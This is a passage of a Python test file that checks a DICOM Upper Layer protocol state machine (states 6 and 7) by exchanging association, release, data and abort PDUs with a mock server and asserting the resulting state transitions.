# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta6 + Evt5."""
# Sta6 + Evt5 -> <ignore> -> Sta6
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta6 + Evt6."""
# Sta6 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt6']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta6 + Evt7."""
# Sta6 + Evt7 -> <ignore> -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt7']
def test_evt08(self):
"""Test Sta6 + Evt8."""
# Sta6 + Evt8 -> <ignore> -> Sta6
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt8']
def test_evt09(self):
"""Test Sta6 + Evt9."""
# Sta6 + Evt9 -> DT-1 -> Sta6
# Evt9: Receive P-DATA primitive from <local user>
# DT-1: Send P-DATA-TF PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt9', 'DT-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt9']
def test_evt10(self):
"""Test Sta6 + Evt10."""
# Sta6 + Evt10 -> DT-2 -> Sta6
# Evt10: Receive P-DATA-TF PDU from <remote>
# DT-2: Send P-DATA primitive
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', p_data_tf),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt10', 'DT-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt10']
def test_evt11(self):
"""Test Sta6 + Evt11."""
# Sta6 + Evt11 -> AR-1 -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt11']
def test_evt12(self):
"""Test Sta6 + Evt12."""
# Sta6 + Evt12 -> AR-2 -> Sta8
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-2: Issue A-RELEASE (rq) primitive
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt12']
def test_evt13(self):
"""Test Sta6 + Evt13."""
# Sta6 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rp),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt13']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta6 + Evt14."""
# Sta6 + Evt14 -> <ignore> -> Sta6
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt14']
def test_evt15(self):
"""Test Sta6 + Evt15."""
# Sta6 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.abort()
time.sleep(0.1)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt15']
# Issue A-ABORT PDU
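        # (Here the source byte is 0x00 - service-user - because AA-1 sends
        # the abort on behalf of the local A-ABORT request primitive, unlike
        # the provider-initiated aborts sent by AA-8.)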
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta6 + Evt16."""
# Sta6 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT, and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt16']
def test_evt17(self):
"""Test Sta6 + Evt17."""
# Sta6 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt17']
def test_evt18(self):
"""Test Sta6 + Evt18."""
# Sta6 + Evt18 -> <ignore> -> Sta6
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.4),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
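        # Shorten the ARTIM timer and start it so it expires during the
        # following sleep; the expiry should be reported as Evt18, which the
        # FSM ignores in Sta6 (presumably the DUL reactor polls the timer).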
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt18']
def test_evt19(self):
"""Test Sta6 + Evt19."""
# Sta6 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
]
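        # (0x08 is not a defined PDU type - only 0x01-0x07 are assigned in
        # PS3.8 - so the bytes sent above should be flagged as an
        # unrecognised PDU and raise Evt19.)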
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt19']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState07(TestStateBase):
"""Tests for State 07: Awaiting A-RELEASE-RP PDU."""
def test_evt01(self):
"""Test Sta7 + Evt1."""
# Sta7 + Evt1 -> <ignore> -> Sta7
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_associate('request'))
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta7 + Evt2."""
# Sta7 + Evt2 -> <ignore> -> Sta7
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta7 + Evt3."""
# Sta7 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt3']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta7 + Evt4."""
# Sta7 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_rj),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt4']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta7 + Evt5."""
# Sta7 + Evt5 -> <ignore> -> Sta7
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta7 + Evt6."""
# Sta7 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt6']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta7 + Evt7."""
# Sta7 + Evt7 -> <ignore> -> Sta7
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt7']
def test_evt08(self):
"""Test Sta7 + Evt8."""
# Sta7 + Evt8 -> <ignore> -> Sta7
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt8']
def test_evt09(self):
"""Test Sta7 + Evt9."""
# Sta7 + Evt9 -> <ignore> -> Sta7
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt9']
def test_evt10(self):
"""Test Sta7 + Evt10."""
# Sta7 + Evt10 -> AR-6 -> Sta7
# Evt10: Receive P-DATA-TF PDU from <remote>
# AR-6: Send P-DATA primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', p_data_tf),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
#primitive = self.assoc.dul.receive_pdu(wait=False)
#assert isinstance(primitive, P_DATA)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt10', 'AR-6'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt10']
def test_evt11(self):
"""Test Sta7 + Evt11."""
# Sta7 + Evt11 -> <ignore> -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt11']
def test_evt12(self):
"""Test Sta7 + Evt12."""
# Sta7 + Evt12 -> AR-8 -> Sta9 or Sta10
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-8: Issue A-RELEASE (rq) - release collision
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12']
def test_evt13(self):
"""Test Sta7 + Evt13."""
# Sta7 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rp),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
primitive = self.assoc.dul.receive_pdu(wait=False)
assert isinstance(primitive, A_RELEASE)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt13', 'AR-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt13']
def test_evt14(self):
"""Test Sta7 + Evt14."""
# Sta7 + Evt14 -> <ignore> -> Sta7
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt14']
def test_evt15(self):
"""Test Sta7 + Evt15."""
# Sta7 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt15']
def test_evt16(self):
"""Test Sta7 + Evt16."""
# Sta7 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt16']
def test_evt17(self):
"""Test Sta7 + Evt17."""
# Sta7 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt17']
def test_evt18(self):
"""Test Sta7 + Evt18."""
# Sta7 + Evt18 -> <ignore> -> Sta7
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
